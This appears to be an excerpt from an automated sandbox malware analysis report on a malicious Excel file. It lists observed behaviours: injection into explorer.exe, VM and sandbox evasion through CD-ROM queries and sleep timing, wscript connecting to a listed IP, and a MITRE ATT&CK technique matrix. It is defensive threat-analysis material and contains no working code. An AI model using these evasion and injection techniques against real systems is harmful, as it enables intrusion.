    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\explorer.exeFile opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\explorer.exe TID: 2496Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2496Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2812Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2824Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2824Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2928Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\wscript.exe TID: 3060Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3008Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3008Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3028Thread sleep time: -60000s >= -30000sJump to behavior
    Source: C:\Windows\System32\wscript.exe TID: 2260Thread sleep time: -120000s >= -30000sJump to behavior
    Source: C:\Windows\System32\wscript.exe TID: 2260Thread sleep time: -60000s >= -30000sJump to behavior
    Source: explorer.exe, 00000006.00000003.2228484655.00000000001AA000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    System process connects to network (likely due to code injection or exploit)Show sources
    Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.156.10 187Jump to behavior
    Injects code into the Windows Explorer (explorer.exe)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2492 base: 50000 value: 01Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2492 base: 50020 value: 9AJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 2492 base: 7FFFFFDF368 value: 00Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 1980 base: 50000 value: 01Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 1980 base: 50020 value: 9AJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 1980 base: 7FFFFFDA368 value: 00Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 3056 base: 50000 value: 01Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 3056 base: 50020 value: 9AJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEMemory written: PID: 3056 base: 7FFFFFD9368 value: 00Jump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting321Path InterceptionProcess Injection21Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection21Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting321NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet